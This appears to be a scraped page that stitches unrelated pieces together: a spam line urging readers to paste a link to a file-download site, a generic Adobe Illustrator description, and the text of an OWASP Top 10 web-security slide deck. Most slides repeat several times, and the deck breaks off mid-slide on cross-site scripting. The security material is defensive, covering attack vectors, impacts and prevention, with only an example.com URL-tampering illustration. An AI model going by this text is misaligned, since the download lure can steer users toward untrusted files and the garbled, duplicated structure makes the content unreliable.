🌍📱👉COPY LINK & PASTE ON GOOGLE http://drfiles.net/ 👈🌍
Adobe Illustrator is a powerful, professional-grade vector graphics software used for creating a wide range of designs, including logos, icons, illustrations, and more. Unlike raster graphics (like photos), which are made of pixels, vector graphics in Illustrator are defined by mathematical equations, allowing them to be scaled up or down infinitely without losing quality.
Here's a more detailed explanation:
Key Features and Capabilities:
Vector-Based Design:
Illustrator's foundation is its use of vector graphics, meaning designs are created using paths, lines, shapes, and curves defined mathematically.
Scalability:
This vector-based approach allows for designs to be resized without any loss of resolution or quality, making it suitable for various print and digital applications.
Design Creation:
Illustrator is used for a wide variety of design purposes, including:
Logos and Brand Identity: Creating logos, icons, and other brand assets.
Illustrations: Designing detailed illustrations for books, magazines, web pages, and more.
Marketing Materials: Creating posters, flyers, banners, and other marketing visuals.
Web Design: Designing web graphics, including icons, buttons, and layouts.
Text Handling:
Illustrator offers sophisticated typography tools for manipulating and designing text within your graphics.
Brushes and Effects:
It provides a range of brushes and effects for adding artistic touches and visual styles to your designs.
Integration with Other Adobe Software:
Illustrator integrates seamlessly with other Adobe Creative Cloud apps like Photoshop, InDesign, and Dreamweaver, facilitating a smooth workflow.
Why Use Illustrator?
Professional-Grade Features:
Illustrator offers a comprehensive set of tools and features for professional design work.
Versatility:
It can be used for a wide range of design tasks and applications, making it a versatile tool for designers.
Industry Standard:
Illustrator is a widely used and recognized software in the graphic design industry.
Creative Freedom:
It empowers designers to create detailed, high-quality graphics with a high degree of control and precision.
3. The Open Web Application
Security Project
The Open Web Application Security Project® (OWASP) is a nonprofit foundation that works to
improve the security of software. Through community-led open-source software projects,
hundreds of local chapters worldwide, tens of thousands of members, and leading educational
and training conferences, the OWASP Foundation is the source for developers and
technologists to secure the web.
4. Top 10 Project
The OWASP Top 10 is a book/referential document
outlining the 10 most critical security concerns for
web application security. The report is put together
by a team of security experts from all over the
world and the data comes from a number of
organizations and is then analyzed.
5. Application
Security Risks. Sometimes these paths are
trivial to find and exploit, and
sometimes they are extremely
difficult.
ATTACK PATHS
The harm that is caused may
be of no consequence, or it
may put you out of business.
IMPACT
7. Injection Flaws
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted
data is sent to an interpreter as part of a command or query. The attacker’s hostile
data can trick the interpreter into executing unintended commands or accessing
data without proper authorization.
INJECTION
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Injection Rating
Injection
8. Attack Vectors.
Almost any source of data can
be an injection vector,
environment variables,
parameters, external and
internal web services, and all
types of users. Injection flaws
occur when an attacker can
send hostile data to an
interpreter.
Security Weaknesses.
Injection flaws are very
prevalent, particularly in legacy
code. Injection vulnerabilities
are often found in SQL, LDAP,
XPath, or NoSQL queries, OS
commands, XML parsers, SMTP
headers and ORM queries.
Injection flaws are easy to
discover when examining code.
Scanners and fuzzers can help
attackers find injection flaws.
Impacts.
Injection can result in data loss,
corruption, or disclosure to
unauthorized parties, loss of
accountability, or denial of
access. Injection can sometimes
lead to complete host takeover.
The business impact depends
on the needs of the application
and data.
INJECTION
9. Attack Vectors.
Almost any source of data can
be an injection vector,
environment variables,
parameters, external and
internal web services, and all
types of users. Injection flaws
occur when an attacker can
send hostile data to an
interpreter.
Security Weaknesses.
Injection flaws are very
prevalent, particularly in legacy
code. Injection vulnerabilities
are often found in SQL, LDAP,
XPath, or NoSQL queries, OS
commands, XML parsers, SMTP
headers and ORM queries.
Injection flaws are easy to
discover when examining code.
Scanners and fuzzers can help
attackers find injection flaws.
Impacts.
Injection can result in data loss,
corruption, or disclosure to
unauthorized parties, loss of
accountability, or denial of
access. Injection can sometimes
lead to complete host takeover.
The business impact depends
on the needs of the application
and data.
INJECTION
10. Attack Vectors.
Almost any source of data can
be an injection vector,
environment variables,
parameters, external and
internal web services, and all
types of users. Injection flaws
occur when an attacker can
send hostile data to an
interpreter.
Security Weaknesses.
Injection flaws are very
prevalent, particularly in legacy
code. Injection vulnerabilities
are often found in SQL, LDAP,
XPath, or NoSQL queries, OS
commands, XML parsers, SMTP
headers and ORM queries.
Injection flaws are easy to
discover when examining code.
Scanners and fuzzers can help
attackers find injection flaws.
Impacts.
Injection can result in data loss,
corruption, or disclosure to
unauthorized parties, loss of
accountability, or denial of
access. Injection can sometimes
lead to complete host takeover.
The business impact depends
on the needs of the application
and data.
INJECTION
11. SQL Injection
Attack Scenario
INJECTION
Imagine an application that connects drivers who need a
parking spot with spot owners. This diagram shows an
API endpoint that return a single spot details.
Setting the Scene
12. Use Safe API.
Use a safe API, which avoids the
use of the interpreter entirely or
provides a parameterized interface,
or migrate to use Object Relational
Mapping Tools (ORMs).
Validation and Escaping
Use server-side input validation.
This is not a complete defense as
many applications require special
characters So you also need to
escape special characters using the
specific escape syntax for that
interpreter .
Limit the Results
Use LIMIT and other SQL query
result controls within queries to
prevent mass disclosure of records
in case of SQL injection.
Preventing
SQL Injection
INJECTION
13. Use Safe API.
Use a safe API, which avoids the
use of the interpreter entirely or
provides a parameterized interface,
or migrate to use Object Relational
Mapping Tools (ORMs).
Validation and Escaping
Use server-side input validation.
This is not a complete defense as
many applications require special
characters So you also need to
escape special characters using the
specific escape syntax for that
interpreter .
Limit the Results
Use LIMIT and other SQL query
result controls within queries to
prevent mass disclosure of records
in case of SQL injection.
Preventing
SQL Injection
INJECTION
14. Use Safe API.
Use a safe API, which avoids the
use of the interpreter entirely or
provides a parameterized interface,
or migrate to use Object Relational
Mapping Tools (ORMs).
Validation and Escaping
Use server-side input validation.
This is not a complete defense as
many applications require special
characters So you also need to
escape special characters using the
specific escape syntax for that
interpreter .
Limit the Results
Use LIMIT and other SQL query
result controls within queries to
prevent mass disclosure of records
in case of SQL injection.
Preventing
SQL Injection
INJECTION
15. Broken Authentication
Broken authentication is an umbrella term for weaknesses that attackers exploit to
impersonate legitimate users online.
BROKEN AUTHENTICATION
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Broken Authentication Rating
Broken Authentication
16. Attack Vectors.
Broken authentication refers to
weaknesses in two areas:
session management and
credential management. Both
can be used by attackers to
impersonate a user: hijacked
session IDs or stolen login
credentials.
Security Weaknesses.
The prevalence of broken
authentication is widespread
because the design and
implementation of most
identity and access controls.
Session management is the
bedrock of authentication and
access controls, and is present
in all Stateful applications.
Impacts.
Attackers have to gain access to
only a few accounts, or just one
admin account to compromise
the system. Depending on the
domain of the application, this
may allow money laundering,
social security fraud, and
identity theft, or disclose legally
protected highly sensitive
information.
BROKEN AUTHENTICATION
17. Attack Vectors.
Broken authentication refers to
weaknesses in two areas:
session management and
credential management. Both
can be used by attackers to
impersonate a user: hijacked
session IDs or stolen login
credentials.
Security Weaknesses.
The prevalence of broken
authentication is widespread
because the design and
implementation of most
identity and access controls.
Session management is the
bedrock of authentication and
access controls, and is present
in all Stateful applications.
Impacts.
Attackers have to gain access to
only a few accounts, or just one
admin account to compromise
the system. Depending on the
domain of the application, this
may allow money laundering,
social security fraud, and
identity theft, or disclose legally
protected highly sensitive
information.
BROKEN AUTHENTICATION
18. Attack Vectors.
Broken authentication refers to
weaknesses in two areas:
session management and
credential management. Both
can be used by attackers to
impersonate a user: hijacked
session IDs or stolen login
credentials.
Security Weaknesses.
The prevalence of broken
authentication is widespread
because the design and
implementation of most
identity and access controls.
Session management is the
bedrock of authentication and
access controls, and is present
in all Stateful applications.
Impacts.
Attackers have to gain access to
only a few accounts, or just one
admin account to compromise
the system. Depending on the
domain of the application, this
may allow money laundering,
social security fraud, and
identity theft, or disclose legally
protected highly sensitive
information.
BROKEN AUTHENTICATION
19. A web session is a
sequence of network
HTTP request and
response transactions
associated with the
same user.
20. Session Management
Weaknesses
Exposes Session IDs in the
URL (e.g., URL rewriting).
Does not rotate Session
IDs after successful login.
Does not properly
invalidate Session IDs. User
sessions or authentication
tokens
BROKEN AUTHENTICATION
21. Session Management
Attack Scenarios
#1 Session Hijacking
BROKEN AUTHENTICATION Anatomy of Attack
Attackers use stolen session IDs to impersonate users’
identities. Some of the ways a session can be hijacked
are: XSS, Session Side Jacking (Packet Sniffing) and
Session Fixation.
22. Session Management
Attack Scenarios
#2 Session Fixation
BROKEN AUTHENTICATION Anatomy of Attack
One commonly overlooked best practice is to rotate
session IDs after a user logs in, instead of giving a user
the same ID before and after authentication. Attacker
with a legitimate yet expired session ID can trick the user
into re-authenticate then gain access to his/her account.
23. Permits automated attacks
such as credential stuffing,
where the attacker has a
list of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted,
or weakly hashed
passwords
Has missing or ineffective
multi factor authentication.
BROKEN AUTHENTICATION
Credential Management Weaknesses
24. Permits automated attacks
such as credential stuffing,
where the attacker has a list
of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted,
or weakly hashed
passwords
BROKEN AUTHENTICATION
Credential Management Weaknesses
Has missing or ineffective
multi factor authentication.
25. Permits automated attacks
such as credential stuffing,
where the attacker has a list
of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted,
or weakly hashed
passwords
BROKEN AUTHENTICATION
Credential Management Weaknesses
Has missing or ineffective
multi factor authentication.
Other Types of Brute Force Attacks
• Simple Brute Force Attack
• Dictionary Attack
• Reverse Brute Force Attack
• Hybrid Brute Force Attack
• Password Spraying
• Account Enumeration
• Botnets
26. Permits automated attacks
such as credential stuffing,
where the attacker has a list
of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted,
or weakly hashed
passwords
BROKEN AUTHENTICATION
Credential Management Weaknesses
Has missing or ineffective
multi factor authentication.
27. Permits automated attacks
such as credential stuffing,
where the attacker has a list
of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted,
or weakly hashed
passwords
BROKEN AUTHENTICATION
Credential Management Weaknesses
Has missing or ineffective
multi factor authentication.
28. Permits automated attacks
such as credential stuffing,
where the attacker has a list
of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted,
or weakly hashed
passwords
BROKEN AUTHENTICATION
Credential Management Weaknesses
Has missing or ineffective
multi factor authentication.
29. Permits automated attacks
such as credential stuffing,
where the attacker has a list
of valid usernames and
passwords.
Permits brute force or
other automated attacks.
Permits default, weak, or
well known passwords,
such as "Password1" or
"admin/admin”
Uses weak or ineffective
credential recovery and
forgot password processes,
such as "knowledge based
answers", which cannot be
made safe.
Uses plain text, encrypted, or
weakly hashed passwords
BROKEN AUTHENTICATION
Credential Management Weaknesses
Has missing or ineffective
multi factor authentication.
30. • Implement multi factor authentication to prevent automated and stolen
credential re-use attacks.
• Do not ship or deploy with any default credentials, particularly
for admin users.
• Implement weak password checks, such as testing new or changed
passwords against a list of the top 10000 worst passwords
• Align password length, complexity and rotation policies with NIST 800-63 B's
guidelines in section 5.1.1 for Memorized Secrets or other modern, evidence
based password policies.
• Use the same messages for all outcomes of the auth-related requests
• Throttle failed login attempts. Log all failures and alert administrators when
credential stuffing, brute force, or other attacks are detected.
• Use a server side, secure, session manager that generates a new random
session ID with high entropy after login. Session IDs should not be in the
URL, be securely stored and invalidated after logout, idle, and absolute
timeouts
How to Prevent
BROKEN AUTHENTICATION
31. Sensitive Data Exposure
Sensitive data exposure vulnerabilities can occur when a web app. does not
properly protect sensitive information from being disclosed to attackers. This can
include Personal Identifying Information (PPI) such as credit card data, medical
history, session tokens, or other authentication credentials.
SENSITIVE DATA EXPOSURE
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Sensitive Data Exposure Rating
Sensitive Data Exposure
32. Attack Vectors.
Instead of directly attacking
crypto, attackers steal keys,
execute man in the middle
attacks, or steal clear text
data off the server, while in
transit, or from the user’s client,
e.g. browser. A manual attack is
generally required.
Security Weaknesses.
The most common flaw is
simply not encrypting sensitive
data. Even when crypto is
employed, weak key generation
and management, and weak
algorithm, protocol and cipher
usage is common.
For data in transit, server side
weaknesses are mainly easy to
detect, but hard for data at rest.
Impacts.
Failure frequently compromises
all data that should have been
protected. Typically, this
information includes sensitive
PII, which often require
protection as defined by laws or
regulations such as the EU
GDPR or local privacy laws.
SENSITIVE DATA EXPOSURE
33. Attack Vectors.
Instead of directly attacking
crypto, attackers steal keys,
execute man in the middle
attacks, or steal clear text
data off the server, while in
transit, or from the user’s client,
e.g. browser. A manual attack is
generally required.
Security Weaknesses.
The most common flaw is
simply not encrypting sensitive
data. Even when crypto is
employed, weak key generation
and management, and weak
algorithm, protocol and cipher
usage is common.
For data in transit, server side
weaknesses are mainly easy to
detect, but hard for data at rest.
Impacts.
Failure frequently compromises
all data that should have been
protected. Typically, this
information includes sensitive
PII, which often require
protection as defined by laws or
regulations such as the EU
GDPR or local privacy laws.
SENSITIVE DATA EXPOSURE
34. Attack Vectors.
Instead of directly attacking
crypto, attackers steal keys,
execute man in the middle
attacks, or steal clear text
data off the server, while in
transit, or from the user’s client,
e.g. browser. A manual attack is
generally required.
Security Weaknesses.
The most common flaw is
simply not encrypting sensitive
data. Even when crypto is
employed, weak key generation
and management, and weak
algorithm, protocol and cipher
usage is common.
For data in transit, server side
weaknesses are mainly easy to
detect, but hard for data at rest.
Impacts.
Failure frequently compromises
all data that should have been
protected. Typically, this
information includes sensitive
PII, which often require
protection as defined by laws or
regulations such as the EU
GDPR or local privacy laws.
SENSITIVE DATA EXPOSURE
35. Ponemon Institute annual Cost of Data Breach
report. Ponemon Institute recruited 524
organizations that experienced data breaches
between August 2019 and April 2020. To
ensure the research is relevant to a broad set
of companies, the organizations in the study
comprise of various sizes, spanning 17
countries and regions as well as 17 industries.
Our researchers interviewed more than 3,200
individuals who are knowledgeable about the
data breach incidents in their organizations.
SENSITIVE DATA EXPOSURE
Impact in 2020
Total Average Cost
$3.86 million
52%
Breaches Caused by
malicious attack
80%
Breaches With
Customer PII
36. Biggest
Data Breaches
Yahoo
Date: Aug 2013
Impact: 3B accounts
Stolen Data: Account data,
security questions and
answers
Alibaba
Date: Nov 2019
Impact: 1.1B data pieces
Stolen Data: usernames
and phone numbers
LinkedIn
Date: Jun 2021
Impact: 700M users
Stolen Data: No sensitive
data was stolen
SENSITIVE DATA EXPOSURE
37. 01
Data Transmission
in Clear Text
• This concerns protocols such as HTTP,
SMTP, and FTP. External internet traffic
is especially dangerous.
• Verify all internal traffic e.g. between
load balancers, web servers, or back
end systems.
02
Storing Data in Clear Text
03
Solid Encryption
• Are any old or weak cryptographic
algorithms
• Using default crypto keys, weak crypto
keys generated or re used, or missing
proper key management or rotation
• User agent security directives or
headers missing?
Possible
Vulnerabilities
SENSITIVE DATA EXPOSURE
• Storing sensitive data in clear text,
including backups for example,
passwords, credit card numbers, health
records, personal information and
business secrets
38. 01
Data Transmission
in Clear Text
• This concerns protocols such as HTTP,
SMTP, and FTP. External internet traffic
is especially dangerous.
• Verify all internal traffic e.g. between
load balancers, web servers, or back
end systems.
02
Storing Data in Clear Text
03
Solid Encryption
• Are any old or weak cryptographic
algorithms
• Using default crypto keys, weak crypto
keys generated or re used, or missing
proper key management or rotation
• User agent security directives or
headers missing?
Possible
Vulnerabilities
SENSITIVE DATA EXPOSURE
• Storing sensitive data in clear text,
including backups for example,
passwords, credit card numbers, health
records, personal information and
business secrets
39. 01
Data Transmission
in Clear Text
• This concerns protocols such as HTTP,
SMTP, and FTP. External internet traffic
is especially dangerous.
• Verify all internal traffic e.g. between
load balancers, web servers, or back
end systems.
02
Storing Data in Clear Text
03
Solid Encryption
• Are any old or weak cryptographic
algorithms
• Using default crypto keys, weak crypto
keys generated or re used, or missing
proper key management or rotation
• Missing user agent security directives
or headers
Possible
Vulnerabilities
SENSITIVE DATA EXPOSURE
• Storing sensitive data in clear text,
including backups for example,
passwords, credit card numbers, health
records, personal information and
business secrets
40. At Rest
Data at rest is housed in a system is thought to be less
vulnerable without the threat of attacks in passing, but
more valuable. Attackers use different vectors to get ahold
of housed data, often using malware like Trojan horses or
computer worms. Both of these gain access into systems
housing data through direct downloading from a malicious
USB drive or by clicking malicious links that are sent via
email or instant message.
Data
In Transit
Data is often on the move, sending commands and
requests across networks to other servers, applications, or
users. Data in transit is highly vulnerable, especially when
moving across unprotected channels or to the application
programming interface (API) that allows applications to
communicate with one another.
Data
SENSITIVE DATA EXPOSURE
41. SENSITIVE DATA EXPOSURE
Attack Scenarios
#1 Automatic DB Encryption
Anatomy of Attack
An application encrypts credit card numbers in a database
using automatic Data at Rest Encryption (DARE). However, this
data is automatically decrypted when retrieved by an
authenticated user, allowing an SQL injection flaw to retrieve
credit card numbers in clear text.
42. • Classify data processed, transmitted (using TLS protocol), or
stored (DARE) by an application. Identify which data is sensitive
according to privacy laws, regulatory requirements,
or business needs.
• by the server, and secure parameters. Enforce encryption using
directives like HTTP Strict Transport Security (HSTS). Don’t store
sensitive data unnecessarily (disable caching). Discard it as soon
as possible or use PCI DSS compliant tokenization
or even truncation. Data that is not retained cannot be stolen.
• Store passwords using strong adaptive and salted
hashing functions with a work factor (delay factor).
• Verify independently the effectiveness of configuration
and settings.
How to Prevent
SENSITIVE DATA EXPOSURE
43. XML External Entities
XXE Injection is not limited to Web Applications; anywhere there is an XML Parser
(web, host, software), the potential for XXE exists. XXE caused by an entirely valid
functionality of the XML language. simply an abusable feature that is frequently
enabled by default. This feature is the external entity.,
XML EXTERNAL ENTITIES
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
XML External Entities Rating
XXE
44. eXtensible Markup
Language.
XML is a text-based
markup language derived
from Standard Generalized
Markup Language (SGML).
XML is used to store data
in a structural/semantic
representation, rather than
specifying how to display it
like HTML tags.
XML is not going to
replace HTML in the near
future, but still it has
adopted many successful
features of HTML.
XML EXTERNAL ENTITIES
45. Exchange
the information between
organizations and systems.
Merge
with style sheets to create
almost any desired output.
Store
and arrange the data,
which can customize your
data handling needs.
XML Usage
XML EXTERNAL ENTITIES
46. Exchange
the information between
organizations and systems.
Merge
with style sheets to create
almost any desired output.
Store
and arrange the data,
which can customize your
data handling needs.
XML Usage
XML EXTERNAL ENTITIES
47. Exchange
the information between
organizations and systems.
Merge
with style sheets to create
almost any desired output.
Store
and arrange the data,
which can customize your
data handling needs.
XML Usage
XML EXTERNAL ENTITIES
49. Document Type
Definition
XML EXTERNAL ENTITIES
• A Document Type Definition (DTD) defines the
structure and the legal elements and attributes of an XML
document.
• With a DTD, independent groups of people can agree on
a standard for interchanging data and can use it to verify
that XML data is valid.
• DTD can be declared in two ways: internal and external
51. Attack Vectors.
Attackers can exploit
vulnerable XML processors if
they can upload XML or
include hostile content in an
XML document, exploiting
vulnerable code,
dependencies or integrations.
Security Weaknesses.
By default, many older XML
processors allow specification
of an external entity, a URI
that is dereferenced and
evaluated during XML
processing.
Impacts.
These flaws can be used to
extract data, execute a
remote request from the
server, scan internal systems,
perform a denial-of-service
attack, as well as execute
other attacks.
XML EXTERNAL ENTITIES
52. Attack Vectors.
Attackers can exploit
vulnerable XML processors if
they can upload XML or
include hostile content in an
XML document, exploiting
vulnerable code,
dependencies or integrations.
Security Weaknesses.
By default, many older XML
processors allow specification
of an external entity, a URI
that is dereferenced and
evaluated during XML
processing.
Impacts.
These flaws can be used to
extract data, execute a
remote request from the
server, scan internal systems,
perform a denial-of-service
attack, as well as execute
other attacks.
XML EXTERNAL ENTITIES
53. Attack Vectors.
Attackers can exploit
vulnerable XML processors if
they can upload XML or
include hostile content in an
XML document, exploiting
vulnerable code,
dependencies or integrations.
Security Weaknesses.
By default, many older XML
processors allow specification
of an external entity, a URI
that is dereferenced and
evaluated during XML
processing.
Impacts.
These flaws can be used to
extract data, execute a
remote request from the
server, scan internal systems,
perform a denial-of-service
attack, as well as execute
other attacks.
XML EXTERNAL ENTITIES
54. Attack Scenarios
#1 Injection
Anatomy of Attack
Data from a form is wrapped in XML and sent to the server to
be processed. The attacker will Intercept the vulnerable POST
request. Add the injected ENTITY tag and &xxe; variable
reference. ensure the &xxe; reference is with data that will be
returned and displayed
XML EXTERNAL ENTITIES
55. Attack Scenarios
#1 Injection
Anatomy of Attack
Data from a form is wrapped in XML and sent to the server to
be processed. The attacker will Intercept the vulnerable POST
request. Add the injected ENTITY tag and &xxe; variable
reference. ensure the &xxe; reference is with data that will be
returned and displayed
XML EXTERNAL ENTITIES
56. • Use as less complex data formats as possible. Such as JSON, and
avoiding serialization of sensitive data.
• Patch or upgrade all XML processors and libraries in use by the
application or on the underlying operating system. Use
dependency checkers. Update SOAP to SOAP 1.2 or higher.
• Disable XML external entity and DTD processing in all XML
parsers in the application
• Implement positive (“whitelisting”) server-side input validation,
filtering, or sanitization to prevent hostile data within XML
documents, headers, or nodes
• Verify that XML or Extensible Stylesheet Language (XSL) file
upload functionality validates incoming XML using XML Schema
Definition (XSD) validation or similar.
How to Prevent
XML EXTERNAL ENTITIES
57. Broken Access Control
Access control, sometimes called authorization, is how a web application allow access to
content and functions to certain user(s). These checks are performed after authentication, and
govern what ‘authorized’ users are allowed to do. It sounds like a simple problem but is tricky to
implement correctly. In addition, the users may fall into a number of groups or roles with
different abilities or privileges.
BROKEN ACCESS CONTROL
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Broken Access Control Rating
Broken Access Control
58. Attack Vectors.
Exploitation of access control
is a core skill of attackers. It is
detectable using manual
means, or possibly through
automation for the absence
of access controls in certain
frameworks.
Security Weaknesses.
Access control weaknesses
are common due to the lack
of automated detection, and
lack of effective functional
testing by application
developers.
Impacts.
The technical impact is
attackers acting as users or
administrators, or users using
privileged functions, or
creating, accessing, updating
or deleting every record.
BROKEN ACCESS CONTROL
59. Attack Vectors.
Exploitation of access control
is a core skill of attackers. It is
detectable using manual
means, or possibly through
automation for the absence
of access controls in certain
frameworks.
Security Weaknesses.
Access control weaknesses
are common due to the lack
of automated detection, and
lack of effective functional
testing by application
developers.
Impacts.
The technical impact is
attackers acting as users or
administrators, or users using
privileged functions, or
creating, accessing, updating
or deleting every record.
BROKEN ACCESS CONTROL
60. Attack Vectors.
Exploitation of access control
is a core skill of attackers. It is
detectable using manual
means, or possibly through
automation for the absence
of access controls in certain
frameworks.
Security Weaknesses.
Access control weaknesses
are common due to the lack
of automated detection, and
lack of effective functional
testing by application
developers.
Impacts.
The technical impact is
attackers acting as users or
administrators, or users using
privileged functions, or
creating, accessing, updating
or deleting every record.
BROKEN ACCESS CONTROL
61. Attack Scenarios
• Bypassing access control checks by modifying the URL,
internal application state
http://example.com/app/accountInfo?acct=notmyacct
Then using this unverified data in a SQL call
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery( );
• An attacker simply force browses to target URLs. Admin
rights are required for access to the admin page.
http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
BROKEN ACCESS CONTROL
62. • With the exception of public resources, deny by default.
• Unique application business limit requirements should be
enforced by domain models.
• Disable web server directory listing and ensure file
metadata (e.g. .git) and backup files are not present within
web roots.
• Model access controls should enforce record ownership,
rather than accepting that the user can create, read, update,
or delete any record.
• Log access control failures, alert admins when appropriate
(e.g. repeated failures).
• Rate limit API and controller access to minimize the harm
from automated attack tooling.
• JWT tokens should be invalidated on the server after logout.
How to Prevent
BROKEN ACCESS CONTROL
63. Security Misconfiguration
Misconfigurations are often seen as an easy target, as it can be easy to detect on misconfigured
web servers, cloud and applications and then becomes exploitable, causing significant harm and
leading to catastrophic data leakage issues for enterprises
SECURITY MISCONFIGURATION
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Security Misconfiguration Rating
Security Misconfiguration
64. Attack Vectors.
Attackers will often attempt
to exploit unpatched flaws or
access default accounts,
unused pages, unprotected
files and directories, etc to
gain unauthorized access or
knowledge of the system.
Security Weaknesses.
Security misconfiguration can
happen at any level of an
application stack, including
the network services,
platform, web server,
application server, database,
frameworks, custom code,
and pre-installed virtual
machines, containers, or
storage.
Impacts.
Such flaws frequently give
attackers unauthorized
access to some system data
or functionality. Occasionally,
such flaws result in a
complete system
compromise.
SECURITY MISCONFIGURATION
65. Attack Vectors.
Attackers will often attempt
to exploit unpatched flaws or
access default accounts,
unused pages, unprotected
files and directories, etc to
gain unauthorized access or
knowledge of the system.
Security Weaknesses.
Security misconfiguration can
happen at any level of an
application stack, including
the network services,
platform, web server,
application server, database,
frameworks, custom code,
and pre-installed virtual
machines, containers, or
storage.
Impacts.
Such flaws frequently give
attackers unauthorized
access to some system data
or functionality. Occasionally,
such flaws result in a
complete system
compromise.
SECURITY MISCONFIGURATION
66. Attack Vectors.
Attackers will often attempt
to exploit unpatched flaws or
access default accounts,
unused pages, unprotected
files and directories, etc to
gain unauthorized access or
knowledge of the system.
Security Weaknesses.
Security misconfiguration can
happen at any level of an
application stack, including
the network services,
platform, web server,
application server, database,
frameworks, custom code,
and pre-installed virtual
machines, containers, or
storage.
Impacts.
Such flaws frequently give
attackers unauthorized
access to some system data
or functionality. Occasionally,
such flaws result in a
complete system
compromise.
SECURITY MISCONFIGURATION
67. Possible Vulnerabilities
• Missing appropriate configuration and permissions across any
part of the application stack.
• Unnecessary features are enabled or installed (e.g. unnecessary
ports, services, pages, accounts, or privileges).
• Default accounts and their passwords still enabled and
unchanged.
• Error handling reveals stack traces or other overly informative
error messages to users.
• For upgraded systems, latest security features are disabled or not
configured securely.
• The security settings in the application servers, application
frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc.
not set to secure values.
SECURITY MISCONFIGURATION
68. How to Prevent
• A minimal platform without any unnecessary features,
components, documentation, and samples. Remove or do not
install unused features and frameworks.
• A task to review and update the configurations appropriate to
all security notes, updates and patches
• A segmented application architecture that provides effective,
secure separation between components or tenants, with
segmentation, containerization, or cloud security groups
SECURITY MISCONFIGURATION
69. Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected
into trusted websites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a different end user. Flaws that
allow these attacks to succeed are quite widespread and occur anywhere a web application uses
input from a user within the output it generates without validating or encoding it.
CROSS-SITE SCRIPTING
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
XSS Rating
XSS
70. Attack Vectors.
Automated tools can detect
and exploit all three forms of
XSS, which are: Reflected XSS,
Stored XSS and DOM XSS. It
is so common that there are
freely available exploitation
frameworks.
Security Weaknesses.
XSS is the second most
prevalent issue in the OWASP
Top 10, and is found in
around two thirds of all
applications. Automated
tools can find some XSS
problems automatically,
particularly in mature
technologies such as PHP,
J2EE / JSP, and ASP.NET.
Impacts.
The impact of XSS is
moderate for reflected and
DOM XSS, and severe for
stored XSS, with remote code
execution on the victim’s
browser, such as stealing
credentials, sessions, or
delivering malware to the
victim.
CROSS-SITE SCRIPTING
71. Attack Vectors.
Automated tools can detect
and exploit all three forms of
XSS, which are: Reflected XSS,
Stored XSS and DOM XSS. It
is so common that there are
freely available exploitation
frameworks.
Security Weaknesses.
XSS is the second most
prevalent issue in the OWASP
Top 10, and is found in
around two thirds of all
applications. Automated
tools can find some XSS
problems automatically,
particularly in mature
technologies such as PHP,
J2EE / JSP, and ASP.NET.
Impacts.
The impact of XSS is
moderate for reflected and
DOM XSS, and severe for
stored XSS, with remote code
execution on the victim’s
browser, such as stealing
credentials, sessions, or
delivering malware to the
victim.
CROSS-SITE SCRIPTING
72. Attack Vectors.
Automated tools can detect
and exploit all three forms of
XSS, which are: Reflected XSS,
